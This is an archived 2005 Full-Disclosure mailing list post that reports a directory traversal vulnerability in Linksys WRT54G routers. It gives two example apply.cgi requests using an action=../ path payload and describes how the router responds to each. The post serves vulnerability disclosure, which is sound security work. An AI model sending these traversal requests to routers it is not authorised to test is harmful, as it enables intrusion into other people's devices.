mailing list archives
WRT54G directory trasversial vulnerability
From: Shell <shell6 () gmail com>
Date: Wed, 12 Oct 2005 16:36:31 -0400
I just found a vulnerability in Linksys WRT54G routers.
It loads the page after action
http://192.168.1.1/apply.cgi?action=../ returns the setup page
http://192.168.1.1/apply.cgi?action=../blah returns that the file does not exist
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/
- WRT54G directory trasversial vulnerability Shell (Oct 13)